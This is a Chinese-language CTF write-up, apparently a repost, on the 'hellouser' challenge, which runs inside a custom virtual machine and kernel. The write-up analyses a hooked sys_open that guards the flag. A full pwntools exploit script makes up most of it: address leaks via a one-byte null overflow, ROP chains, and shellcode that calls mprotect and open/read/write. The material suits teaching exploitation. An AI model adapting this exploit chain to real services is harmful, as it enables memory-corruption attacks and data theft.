26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
static const void* syscall_table[MAX_SYS_NR + 1] = {
#define ENTRY(f) [SYS_##f]=sys_##f

ENTRY(read),
ENTRY(write),
ENTRY(open),
ENTRY(close),
ENTRY(fstat),
ENTRY(mmap),
ENTRY(mprotect),
ENTRY(munmap),
ENTRY(brk),
ENTRY(writev),
ENTRY(access),
/* ENTRY(execve), */
ENTRY(exit),
ENTRY(arch_prctl),
ENTRY(fadvise64),
ENTRY(exit_group),
ENTRY(openat),

#undef ENTRY
};


uint64_t syscall_handler(
uint64_t arg0, uint64_t arg1, uint64_t arg2,
uint64_t arg3, uint64_t arg4, uint64_t arg5) {

uint32_t nr;
asm("mov %[nr], eax;"
: [nr] "=r"(nr)
);
char *sys = 0;
switch(nr) {
case 0: sys = "read"; break;
case 1: sys = "write"; break;
case 2: sys = "open"; break;
case 3: sys = "close"; break;
...

最终,我们就可以在 Kernel中找到 系统调用表。

User

用户态的程序就和正常的 pwn题一样可以直接在我们本机上运行,在此不做过多分析。

Hellouser

程序分析

Hellouser的总体逻辑和 helloheap很相似,但是更为简单。

但是,由于是在自己的 kernel 里跑的,所以其 syscall 或者 系统调用都做了新的处理。但是 Kernel 里有一个 很重要的点是,没有开启 NEX,也就是数据执行保护,我们可以执行任意shellcode

利用分析

首先分析单独一个用户态程序的利用:

  1. 修改 edit_flag 和 backdoor_flag

首先执行 后门函数,泄露 plt地址,得到edit_flag的地址。由于修改 第10个块name时,存在一个 一字节 null 溢出,通过这个溢出可以修改第9块的 slogan_addr,我们将 slogan_addr修改为 edit_flag的地址。最后通过第9块即可修改 edit_flag 和 backdoor_flag 的值。自此,我们即可依次泄露 stack 和 libc 的地址,同时实现任意地址读写。

此时,我们在本机执行ORW是可以成功的,但是加上虚拟化后执行会失败。因此我们就需要分析内核对于orw 等各类系统调用是否做了修改

  1. Virtual分析

image-20201027093854548

可以看到未设置 ERREF寄存器,所以 可以直接执行 shellcode

  1. Kernel分析

首先我们按照上面所讲的标志,可以找到 Kernel中的 syscall_table

image-20201026213456176

然后,我们即可找到对应的 ORW函数了,我们可以看到 sys_open函数:

image-20201026213627715

当检测到 打开的文件名是 flag时,其会执行一个 hook函数,而不是执行正常的流程。

image-20201026214135430

hook的主要流程是使用 hp_read函数读取 flag到内存中,然后调用 mprotect函数修改了该内存为只写。所以,我们的方法应该是先调用 mprotect将这块内存的保护方式改为 可读可写,然后使用 ORW将这块内存的内容读取出来。这里由于未开启 NEX,可以直接执行shellcode。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 2
if debug == 1:
p = process('./hellouser')
elf = ELF('./hellouser')
libc = ELF('./libc.so')
elif debug == 2:
p = process(['./hellovirtual','./hellokernel','./ld.so.2','./hellouser'])
elf = ELF('./hellouser')
libc = ELF('./libc.so.6')
else:
p = remote('')

def add(size, name=b"1 ", content=b"1"):
p.sendlineafter("your choice:", "1")
p.sendafter("team name:", name)
p.sendlineafter("slogan size:", str(size))
p.sendafter("team slogan:", content)


def delete(index):
p.sendlineafter("your choice:", "2")
p.sendlineafter("team id:", str(index))


def edit_content(index, content):
p.sendlineafter("your choice:", "3")
p.sendlineafter("your team id:", str(index))
p.sendlineafter("new slogan:", content)


def edit_name(index, name):
p.sendlineafter("your choice:", "4")
p.sendlineafter("your team id:", str(index))
p.sendafter("new name:", name)


def magic(index, magic_index):
magic_dic = ["stackbase", "codebase", "libcbase"]
p.sendlineafter("your choice:", "4919")
p.sendlineafter("your team id:", str(index))
p.sendlineafter("do you want?", magic_dic[magic_index])

def pwn():
name = 'a'
p.sendafter("you name:)", name)
add(0x68, '1', cyclic(29)) # chunk0
for i in range(5): # 1-5
add(0x20, '1', cyclic(29))

add(0x70, '1', cyclic(29)) # 6
add(0x100, '/bin/shx00', cyclic(29)) # 7
add(0x80, '1', cyclic(29)) # 8
add(0x68, '1', cyclic(29)) # 9
# cover slogan chunk->chunk_str1

add(0x68, b'1', cyclic(29)) # 10
#gdb.attach(p, 'bp $rebase(0x1399)')
edit_name(10, cyclic(29))

magic(10, 1)
p.recvuntil('[+]code: ')
code_addr = p.recvuntil(' ', drop=True)
plt_base = int(code_addr, 16) - 0xcba
print 'code_addr',code_addr,'plt_base:',hex(plt_base)

#change edit_flag and backdoor_flag
edit_flag = plt_base + 0x2030b8
edit_content(10, p64(edit_flag)+p64(0x100)[:7])
payload = p32(20) + p32(1)
edit_content(9, payload) #9

magic(10, 2)
p.recvuntil('[+]libc: ')
libc_addr = p.recvuntil(' ', drop=True)
libc_base = int(libc_addr, 16) - libc.sym['_IO_2_1_stdout_']
print 'libc_addr',libc_addr,'libc_base:',hex(libc_base)

payload = p32(20) + p32(1)
edit_content(9, payload)

magic(10, 0)
p.recvuntil('[+]stack: ')
stack_addr = p.recvuntil(' ', drop=True)
ret_addr = int(stack_addr, 16) + 0x48
# stack_base = stack_addr & 0xfffffffff000
# print 'stack_base:',hex(stack_base)
print 'stack_addr',stack_addr,'ret_addr:',hex(ret_addr)

payload = p32(20) + p32(1) + './flagx00x00'
edit_content(9, payload)

libc.address = libc_base
print hex(libc.address)
if debug == 1:
p_rdi_r = 0x2155f + libc.address
p_rsi_r = 0x23e8a + libc.address
p_rdx_r = 0x1b96 + libc.address
p_rax_r = 0x43a78 + libc.address
syscall = 0xd29d5 + libc.address
else:
p_rdi_r = 0x2155f + libc.address
p_rsi_r = 0x23e8a + libc.address
p_rdx_r = 0x1b96 + libc.address
p_rax_r = 0x43a78 + libc.address
syscall = 0xd29d5 + libc.address

flag_str_addr = edit_flag+8
flag_addr = plt_base + 0x203500
stack_addr = ret_addr+ 0x90

# protect = flat([
# p_rdi_r, stack_base,
# p_rsi_r, 0x1000,
# p_rdx_r, 7,
# p_rax_r, 10,
# syscall
# ])

rop = flat([
p_rdi_r, 0x1000,
p_rsi_r, 0x1000,
p_rdx_r, 7,
p_rax_r, 10,
syscall,
p_rdi_r, 0,
p_rsi_r, stack_addr,
p_rdx_r, 0x200,
p_rax_r, 0,
syscall
])

orw2 = flat([
p_rdi_r, flag_str_addr,
p_rsi_r, 0,
p_rax_r, 2,
syscall,
p_rdi_r, 3,
p_rsi_r, flag_addr,
p_rdx_r, 0x30,
p_rax_r, 0,
syscall,
p_rdi_r, 1,
p_rsi_r, flag_addr,
p_rdx_r, 0x30,
p_rax_r, 1,
syscall
])

shellcode = asm(shellcraft.open("flag",0,0))
shellcode += asm('''
mov rbp, rax
mov rdi, rbp
mov rsi, 0x1000
mov rdx, 7
mov rax, 0xa
syscall
mov rdi, 1
mov rsi, rbp
mov rdx, 0x30
mov rax, 1
syscall
''')

gdb.attach(p, 'bp $rebase(0x1399)')
edit_content(10, p64(ret_addr))
print 'getshell================>'
# edit_content(9, str(rop))
# p.sendline(str(orw2))
payload = p64(ret_addr+8)+shellcode
edit_content(9, payload)
p.interactive()

pwn()

参考

KVM虚拟化原理探究

HITCON 2018 Abyss WriteUp

HITCON 2018 Abyss 源码

Escape from Stack VM: HITCON 2018 Abyss I

原文地址:https://www.cnblogs.com/dream397/p/14281417.html